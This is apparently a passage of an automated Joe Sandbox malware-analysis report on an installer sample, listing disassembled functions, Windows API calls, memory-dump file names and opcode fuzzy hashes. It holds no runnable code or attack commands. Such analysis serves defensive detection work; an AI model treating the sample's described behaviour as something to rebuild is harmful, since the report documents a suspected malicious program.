                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSendWindow$CountCreateDestroyDialogParamShowTextTickwsprintf
                                                                                                                                                                                                                                                              • String ID: o
                                                                                                                                                                                                                                                              • API String ID: 2510787843-252678980
                                                                                                                                                                                                                                                              • Opcode ID: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
                                                                                                                                                                                                                                                              • Instruction ID: 81059e3b479639814b0572c15c12751123e1a1ca33ddd0d88914a755a74492f9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB21FCB06083059FD710AF65E58875A7FE8FB44309F40843EE4C5A72A1DB798585CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040395E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44timeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: TextTimerWindowwsprintf
                                                                                                                                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%$Lq
                                                                                                                                                                                                                                                              • API String ID: 2438957755-692697396
                                                                                                                                                                                                                                                              • Opcode ID: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                                              • Instruction ID: 5883a2093b31581e9909bbd4cee83827143d54294f5a20fab69da977af55eaa0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9015EB0908304AFD710AF24D48525EBFE8EB48355F50C83EE58997281C7B895859B8A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406557 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                              • Opcode ID: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                                                                                                                                                              • Instruction ID: 922df396bf3e7088f2107368fcd68d656d94b82640ce54d584134d1287f84c7b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E2117B0804308EFDB10AFA9D88829EBFF4EF84314F00C91EE99557281D7B98459CF96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004023C9 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                                                                              • Opcode ID: 0eb1dde49e5088c645436d80e0d320c5bcc3f7de41383c0d5e17875132fa004a
                                                                                                                                                                                                                                                              • Instruction ID: 8f4e6c7c9ceedfa20c72349621b66b9a182318fedd968a48d18be14dbb0e03f5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eb1dde49e5088c645436d80e0d320c5bcc3f7de41383c0d5e17875132fa004a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC1116B19083009FD750EF69D94839EFBF4FB88315F41886EE58897260D7789985CF46
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004021E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93windowtimeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                              • Opcode ID: ae62e435266e3004bc25908d5d2ad0cb5826a6fc8d1708ba3a371f46b01cab50
                                                                                                                                                                                                                                                              • Instruction ID: a790f44bbcbfc51444ab4f93a78f6104840dc0be6af6187218351783eeece817
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae62e435266e3004bc25908d5d2ad0cb5826a6fc8d1708ba3a371f46b01cab50
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 044140B18083109FD715AF6AC84839EFBF4AF84344F41C4AEE488A32A1D7788981CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004020E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 92memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID: #v$Installed
                                                                                                                                                                                                                                                              • API String ID: 3394109436-3218973552
                                                                                                                                                                                                                                                              • Opcode ID: 9eaf42be06e0d8165a7845864ac7e32df8efedfd5a489f51e2e5e30a7a8364af
                                                                                                                                                                                                                                                              • Instruction ID: caab7a00c9507933a32b1cf3e7c2368a526c10743f68ba1ac9ea26b5e2cc4220
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eaf42be06e0d8165a7845864ac7e32df8efedfd5a489f51e2e5e30a7a8364af
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23315EB2908710AFD720EF15D944A6BB7E8EB84705F01853EF985B7380D7789D41CB9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406FCB Relevance: 6.1, APIs: 4, Instructions: 86windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$TextWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1596935084-0
                                                                                                                                                                                                                                                              • Opcode ID: 2d215b4a7c55684c2c01937122f4af6b3fafd761fe9b14146eef76cc387a2035
                                                                                                                                                                                                                                                              • Instruction ID: 83727bad7781ca9a6187a820c8695953688329d0e622d1880d2d702268a23253
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d215b4a7c55684c2c01937122f4af6b3fafd761fe9b14146eef76cc387a2035
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF311CB1D08214AFD710AF69C84466FBBF4EF44714F00C42EE884AB380D779A8458B96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401482 Relevance: 6.1, APIs: 4, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Close$DeleteOpen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2349717609-0
                                                                                                                                                                                                                                                              • Opcode ID: 73014a65c13e40284ebe0f42eb1fd1590c9d0e459a9cea021c48c3b08f52d076
                                                                                                                                                                                                                                                              • Instruction ID: 133f149d38d78df52dcdbba4d89558d011cdd60c8e07d9ce943be9db895a4237
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73014a65c13e40284ebe0f42eb1fd1590c9d0e459a9cea021c48c3b08f52d076
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 643130B0904304AFD710AF29D94479EBBF4EF84310F40886EE98997350D778C9958F96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407D37 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 589700163-0
                                                                                                                                                                                                                                                              • Opcode ID: 128b1f827d319e1f67624c76284cc49d88a0dabf465fa48954d28b908fb3de1d
                                                                                                                                                                                                                                                              • Instruction ID: 94f009cbb2cc83b7245da44e9dca2fd274f464f9a0f55bd6391dd9b653ffba1a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 128b1f827d319e1f67624c76284cc49d88a0dabf465fa48954d28b908fb3de1d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 492194B1C082406FEB217F28988067ABFE49F85720F49847EE4849B251D3786C45CB6B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404AE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                                                                                                              • String ID: =\q$Lq
                                                                                                                                                                                                                                                              • API String ID: 530164218-3019991871
                                                                                                                                                                                                                                                              • Opcode ID: bc2eee6d10165418753e2462cb524adf5d7b8903337a38afe12c1506d900572b
                                                                                                                                                                                                                                                              • Instruction ID: 1ede243bc7e0a0f37790e6dcd7246a005d3f2f3aa806950eac8677958e19fd18
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc2eee6d10165418753e2462cb524adf5d7b8903337a38afe12c1506d900572b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E2187B0A046049FC714DF6AD885A6BB7F5EF88314F44853EE554D73A0E738AC41CB95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406ED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsWindowVisible.USER32 ref: 00406F16
                                                                                                                                                                                                                                                              • CallWindowProcA.USER32 ref: 00406FB8
                                                                                                                                                                                                                                                                • Part of subcall function 00404BD7: SendMessageA.USER32 ref: 00404C00
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
